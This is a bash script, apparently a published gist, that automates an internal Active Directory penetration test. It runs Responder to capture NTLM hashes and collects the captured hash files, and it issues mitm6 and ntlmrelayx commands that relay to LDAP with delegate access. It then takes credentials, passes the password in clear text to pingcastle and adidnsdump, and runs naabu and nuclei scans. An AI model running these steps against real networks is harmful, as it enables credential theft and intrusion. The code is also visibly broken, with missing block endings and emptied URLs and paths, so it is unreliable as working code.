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Last active June 16, 2024 02:51
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# Function to add items to the todo list
add_to_todo() {
local item="$1"
echo "$item" >> "${folder_name}/todo.txt"
# Function to send alerts via webhook
send_alert() {
local message="$1"
local webhook_url=""
local payload="{\"text\":\"[${domain_name}] ${message}\"}"
curl -s -X POST -H 'Content-type: application/json' --data "$payload" "$webhook_url"
# Check if required applications exist and offer to install them if missing
if [ ! -f "/usr/bin/mapcidr" ] || [ ! -f "/usr/bin/naabu" ] || [ ! -f "/usr/bin/nuclei" ] || [ ! -f "/usr/local/bin/adidnsdump" ]; then
read -p "One or more required applications are missing. Would you like to install these tools? (y/n): " install_tools
if [[ "$install_tools" == "y" ]]; then
# Install Python package
echo "Installing Python package..."
python3 -m pip install git+ >/dev/null
# Define download URLs and tool names
# Download tools to /tmp directory
echo "Downloading required tools to /tmp..."
wget -q "$MAPCIDR_URL" -O /tmp/
wget -q "$NAABU_URL" -O /tmp/
wget -q "$NUCLEI_URL" -O /tmp/
# Extract and move tools to /usr/bin
echo "Extracting and installing tools to /usr/bin..."
sudo unzip -qq /tmp/ -d /usr/bin/
sudo unzip -qq /tmp/ -d /usr/bin/
sudo unzip -qq /tmp/ -d /usr/bin/
# Set executable permissions
sudo chmod +x /usr/bin/mapcidr /usr/bin/naabu /usr/bin/nuclei
# Clean up downloaded files
rm /tmp/ /tmp/ /tmp/
echo "Download, extraction, and installation complete."
echo "Installation of required tools skipped. Please ensure the tools are installed manually."
exit 1
# Function to prompt user with a default value
prompt_with_default() {
local prompt_message="$1"
local default_value="$2"
local user_input
read -p "${prompt_message} [${default_value}]: " user_input
echo "${user_input:-$default_value}"
# Auto-populate variables
default_domain_name=$(cat /etc/resolv.conf | grep search | cut -d ' ' -f2)
default_dc_ip=$(cat /etc/resolv.conf | grep nameserver | cut -d ' ' -f2 | head -n 1)
# Prompt user for input with defaults
folder_name=$(prompt_with_default "Enter folder name" "${default_folder_name}")
domain_name=$(prompt_with_default "Enter domain name" "${default_domain_name}")
dc_ip=$(prompt_with_default "Enter DC IP address" "${default_dc_ip}")
# Display entered variables
echo "You have entered the following values:"
echo "-------------------------------------"
echo "Folder name: ${folder_name}"
echo "Domain name: ${domain_name}"
echo "DC IP address: ${dc_ip}"
echo "-------------------------------------"
# Prompt user to validate the entered variables
read -p "Are these values correct? (y/n): " confirm
if [[ "$confirm" != "y" ]]; then
echo "Please run the script again and enter the correct values."
exit 1
# Create the folder if it does not exist
mkdir -p "${folder_name}"
cd "${folder_name}" || exit
# Prompt user if they have credentials
read -p "Do you have credentials? (y/n): " has_creds
# Check if credentials are provided early
if [[ "$has_creds" == "y" ]]; then
add_to_todo "./ -t ${dc_ip} -d ${domain_name} -u ${username} -p ${password} -o ${folder_name} --auto"
if [[ "$has_creds" != "y" ]]; then
echo "Starting the search for initial access..."
while true; do
echo "Running Responder for 10 minutes... (Attempt $attempt_count)"
timeout 600 responder -I eth0 -wFdDPv
echo "Responder run complete."
# Search for new txt files in the responder logs folder
echo "Searching for new txt files in the responder logs folder..."
new_files=$(find /usr/share/responder/logs -type f -name "*.txt" -mtime -1 2>/dev/null)
if [[ -n "$new_files" ]]; then
echo "Found new files:"
echo "$new_files"
# Send alert before prompting to view files
send_alert "User input required: View Responder hashes."
read -p "Do you want to see the contents of these files? (y/n): " view_files
if [[ "$view_files" == "y" ]]; then
sort -u -t: -k1,1 "$new_files"
# Create the responder_output folder within the specified folder
mkdir -p "${folder_name}/responder_output"
# Copy the new files to the responder_output folder
cp $new_files "${folder_name}/responder_output/"
echo "New files copied to ${folder_name}/responder_output."
elif [[ $attempt_count -eq 3 ]]; then
echo "Failed after 30 minutes. Maybe try mitm6."
echo "Tell the user to run the following commands in the other window:"
echo "mitm6 -d ${domain_name}"
echo "impacket-ntlmrelayx -t ldap://${dc_ip} -6 -smb2support -wh wpadtest --delegate-access"
echo "Move onto the next phase."
add_to_todo "mitm6 -d ${domain_name}"
add_to_todo "impacket-ntlmrelayx -t ldap://${dc_ip} -6 -smb2support -wh wpadtest --delegate-access"
echo "No new files found. Retrying..."
# Send alert before prompting for credentials
send_alert "User input required: Responder Done, Enter credentials."
# Prompt user for credentials
read -p "Enter username: " username
read -sp "Enter password: " password
# Display entered credentials
echo "You have entered the following credentials:"
echo "-------------------------------------"
echo "Username: ${username}"
echo "Password: ${password}"
echo "-------------------------------------"
# Prompt user to validate the entered credentials
read -p "Are these credentials correct? (y/n): " confirm_creds
if [[ "$confirm_creds" != "y" ]]; then
echo "Please run the script again and enter the correct credentials."
exit 1
# Open the URL in the background and disassociate the process
nohup xdg-open https://localhost:8834 >/dev/null 2>&1 &
# Prompt user to run pingcastle.exe command
echo "Please run the following command in a separate window:"
echo "pingcastle.exe --healthcheck --server ${dc_ip} --user ${username}@${domain_name} --password ${password}"
add_to_todo "pingcastle.exe --healthcheck --server ${dc_ip} --user ${username}@${domain_name} --password ${password}"
# Run adidnsdump
echo "Running adidnsdump..."
adidnsdump -u "${domain_name}\\${username}" -p "${password}" --dns-tcp "${dc_ip}"
echo "adidnsdump complete."
# Process records and run mapcidr
echo "Processing records and running mapcidr..."
cat records.csv | grep -Po '(?<![\d.])((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)(\.|$)){4}(?![\d.])' | mapcidr -aa -o "${folder_name}/subnets.txt"
echo "Processing complete."
# Open the subnets.txt file in a text editor and disassociate the process
nohup xdg-open "${folder_name}/subnets.txt" >/dev/null 2>&1 &
# Run naabu and nuclei
echo "Running naabu and nuclei..."
cat "${folder_name}/subnets.txt" | naabu | nuclei -severity critical,high,medium -o "${folder_name}/nuclei.txt"
echo "naabu and nuclei complete."
# Display the todo list
echo "Todo list:"
cat "${folder_name}/todo.txt"
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